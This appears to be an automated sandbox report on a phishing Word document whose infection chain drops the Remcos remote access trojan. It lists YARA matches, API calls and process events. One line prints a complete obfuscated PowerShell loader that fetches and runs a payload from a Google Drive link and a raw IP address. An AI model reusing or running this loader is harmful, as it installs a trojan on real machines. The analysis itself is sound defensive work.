                  Source: Process Memory Space: powershell.exe PID: 1980, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 2924, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 2924, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: CasPol.exe PID: 3608, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\54D5D963.doc, type: DROPPED Matched rule: Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents. Author: ditekSHen
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\deethebestthingwithmegreatattirudewithgreatthigns_________eniterlifewithgreatniceworkingskillwithmebgreatthignstobe________verynicepersonentiterlifewithnewthi[1].doc, type: DROPPED Matched rule: Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents. Author: ditekSHen
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\wg on 85.215.206.82.url
                  Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
                  Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdhVUtpbWFnZVVybCA9IHp0c2h0dHBzOi8vZCcrJ3JpdmUuZ29vZ2xlLmNvbS91YycrJz9leHBvJysncnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHp0czsnKydhVUt3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O2FVS2ltYWdlQnl0ZXMgPSBhVUt3JysnZWJDbGllbnQuRG93bmxvYWREYXRhKGFVS2ltYWdlVXJsKTthVUtpbWFnZVRleCcrJ3QgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhhVUtpbWFnZUJ5dGVzKTthVUtzdGFydEZsYWcgPSB6dHM8PEJBU0U2NF9TVEFSVD4+enRzO2FVS2VuZEZsYWcnKycgPSB6dHM8PEJBU0U2NF9FTkQ+Pnp0czthVUtzdGFydEluZGV4ID0gYVVLaW1hZ2VUZXh0LkluZGV4T2YoYVVLc3RhcnRGbGFnKTthVUtlbmRJbmRleCA9IGFVS2ltYWdlVGV4dC5JbmRleE9mKGFVS2VuZEZsYWcpO2FVS3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBhVUtlbmRJbmRleCAtZ3QnKycgJysnYVVLc3RhcnRJbmRleDthVUtzdCcrJ2FydEluZGV4ICs9IGFVS3N0YXJ0RmxhZy5MZW5nJysndGg7YVVLYmFzZTY0TGVuZ3RoID0gYVVLZW5kSW5kZXggLSBhVUtzdGFydEluZGV4O2FVS2JhJysnc2U2NENvbW1hbmQgPSBhVUtpbWFnZVRleHQuU3Vic3RyaW5nKGFVS3N0YXJ0SW5kZXgsIGFVS2Jhc2U2NExlbmd0aCk7YVVLYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoYVVLYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIGRyYiBGb3JFYWNoLU9iamVjdCB7IGFVS18gfSlbLTEuLi0oYVVLYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTthVUtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGcm9tQmFzJysnZTY0U3RyaW5nKGFVS2Jhc2U2NFJldmVyc2VkKTthVUtsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoYVVLY29tbWFuZEJ5dGVzKTthVUt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0JysnaG9kKHp0c1ZBSXp0cyk7YVVLdmFpTWUnKyd0aG9kLkludm9rZShhVUtudWxsLCBAKHonKyd0c3R4dC5FQ0RGRlJXLzA3Mi8yOC42MDIuNTEyLjU4Ly86cHR0aHp0cywgenRzZGVzYXRpdmFkb3p0JysncywgenRzZGVzJysnYXRpdmEnKydkb3p0cywgenRzZGVzYXRpdmFkb3p0cywgenRzQ2FzUG9senRzLCB6dHNkZXNhdGl2YWRvenRzLCB6dHNkZScrJ3NhdGl2YWRvenRzLHp0c2Rlc2F0aXZhZG96dHMsenRzJysnZGVzYXRpdmFkb3p0cyx6dHNkZXNhdGl2YWRvenQnKydzLHp0c2Rlc2F0aXZhZG96dHMsJysnenRzZGVzYXRpdmFkb3p0cyx6dHMxenRzLHp0c2Rlc2F0aXZhZG96dHMpKTsnKS5yZXBsYWNFKCdhVUsnLCckJykucmVwbGFjRSgnenRzJyxbc1RSaW5HXVtjSEFyXTM5KS5yZXBsYWNFKCdkcmInLCd8Jyl8IC4gKCAkcFNIb01lWzIxXSskUFNob01FWzM0XSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\SysWOW64\mshta.exe Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\SysWOW64\wscript.exe Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_0041330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_0041BBC6 OpenProcess,NtResumeProcess,CloseHandle
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 22_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 22_2_00401806 NtdllDefWindowProc_W
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 22_2_004018C0 NtdllDefWindowProc_W
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 23_2_004016FD NtdllDefWindowProc_A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 23_2_004017B7 NtdllDefWindowProc_A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 24_2_00402CAC NtdllDefWindowProc_A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 24_2_00402D66 NtdllDefWindowProc_A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00261CBD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_0043706A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_00414005
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_0043E11C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_004541D9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_004381E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_0041F18B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_00446270
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_0043E34B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_004533AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_0042742E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_00437566
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_0043E5A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_004387F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_0043797E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_004339D7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_0044DA49
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_00427AD7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_0041DBF3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_00427C40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_00437DB3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_00435EEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_0043DEED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_00426E9F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_10017194
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_1000B5C1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 22_2_0044B040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 22_2_0043610D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 22_2_00447310
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 22_2_0044A490
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 22_2_0040755A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 22_2_0043C560
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 22_2_0044B610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 22_2_0044D6C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 22_2_004476F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 22_2_0044B870
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 22_2_0044081D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 22_2_00414957
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 22_2_004079EE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 22_2_00407AEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 22_2_0044AA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 22_2_00412AA9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 22_2_00404B74
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 22_2_00404B03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 22_2_0044BBD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 22_2_00404BE5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 22_2_00404C76
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 22_2_00415CFE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 22_2_00416D72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 22_2_00446D30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 22_2_00446D8B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 22_2_00406E8F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 23_2_00405038
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 23_2_0041208C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 23_2_004050A9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 23_2_0040511A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 23_2_0043C13A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 23_2_004051AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 23_2_00449300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 23_2_0040D322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 23_2_0044A4F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 23_2_0043A5AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 23_2_00413631
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 23_2_00446690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 23_2_0044A730
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 23_2_004398D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 23_2_004498E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 23_2_0044A886
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 23_2_0043DA09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 23_2_00438D5E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 23_2_00449ED0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 23_2_0041FE83
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 23_2_00430F54
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 24_2_004050C2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 24_2_004014AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 24_2_00405133
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 24_2_004051A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 24_2_00401246
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 24_2_0040CA46
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 24_2_00405235
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 24_2_004032C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 24_2_00401689
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 24_2_00402F60
                  Source: ~WRF{DE8BB6AA-6431-42DF-A763-75296C786D33}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 004169A7 appears 87 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 004165FF appears 35 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 00434801 appears 41 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 00422297 appears 42 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 00434E70 appears 54 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 00402093 appears 50 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 0044DB70 appears 41 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 00401E65 appears 35 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 00444B5A appears 37 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 00413025 appears 79 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 00416760 appears 69 times
                  Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                  Source: C:\Windows\SysWOW64\wscript.exe Process created: Commandline size = 2186
                  Source: 20.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 20.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 20.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 20.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 20.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 20.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000013.00000002.515289278.00000000038C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 1980, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 2924, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 2924, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: CasPol.exe PID: 3608, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\54D5D963.doc, type: DROPPED Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents.
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\deethebestthingwithmegreatattirudewithgreatthigns_________eniterlifewithgreatniceworkingskillwithmebgreatthignstobe________verynicepersonentiterlifewithnewthi[1].doc, type: DROPPED Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents.
                  Source: bhv2D0A.tmp.22.dr Binary or memory string: org.slneighbors
                  Source: classification engine Classification label: mal100.rans.phis.troj.spyw.expl.evad.winDOC@28/44@11/6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 22_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 24_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 22_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$ NAHK22012FA00000.docx.doc
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-N6HMP4
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVR88AF.tmp
                  Source: PO NAHK22012FA00000.docx.doc OLE indicator, Word Document stream: true
                  Source: PO NAHK22012FA00000.docx.doc OLE indicator, Word Document stream: true
                  Source: PO NAHK22012FA00000.docx.doc OLE indicator, Word Document stream: true
                  Source: ~WRD0000.tmp.0.dr OLE indicator, Word Document stream: true
                  Source: ~WRD0000.tmp.0.dr OLE indicator, Word Document stream: true
                  Source: ~WRD0000.tmp.0.dr OLE indicator, Word Document stream: true
                  Source: PO NAHK22012FA00000.docx.doc OLE document summary: title field not present or empty
                  Source: PO NAHK22012FA00000.docx.doc OLE document summary: title field not present or empty
                  Source: PO NAHK22012FA00000.docx.doc OLE document summary: title field not present or empty
                  Source: ~WRF{DE8BB6AA-6431-42DF-A763-75296C786D33}.tmp.0.dr OLE document summary: title field not present or empty
                  Source: ~WRF{DE8BB6AA-6431-42DF-A763-75296C786D33}.tmp.0.dr OLE document summary: author field not present or empty
